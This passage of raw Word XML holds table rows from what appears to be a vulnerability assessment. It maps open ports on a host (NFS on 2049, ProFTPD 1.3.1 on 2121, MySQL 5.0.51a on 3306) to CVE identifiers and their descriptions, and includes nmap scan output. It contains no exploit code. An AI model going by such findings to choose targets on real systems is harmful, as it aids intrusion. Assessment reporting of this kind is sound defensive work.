                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BF053AB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DC6B737" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B6F88A1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2-4 (RPC #100003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60D9658C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2017-7645,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2024-26868</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F199CA1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The NFSv2/NFSv3 server in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfsd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> subsystem in the Linux kernel through 4.10.11 allows remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sunrpc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>svc.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, fs/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfsd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/nfs3xdr.c, and fs/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfsd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nfsxdr.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="3D2F7001" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="184B3FF6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19E18E25" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2121</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D16E9BE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73122916" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ProFTPD</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1.3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1ABF35FE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2008-4242,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2009-0543</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="348714A3" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ProFTPD</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="480D3B24" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FE8B871" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7DF8BE55" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3306</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AAAC9AD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">-info: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1507C2FF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   Protocol: 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D07F9C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   Version: 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ABC6EBF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   Thread ID: 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F15E83" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   Capabilities flags: 43564</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC3D295" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   Some Capabilities: Support41Auth, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SwitchToSSLAfterHandshake</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SupportsCompression</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SupportsTransactions</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ConnectWithDatabase</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, Speaks41ProtocolNew, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>LongColumnFlag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="627275DE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   Status: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Autocommit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5C20BA63" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_  Salt</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: E=@is$Vdt:a^2~F!q7]P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E9B41A7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55328DC4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
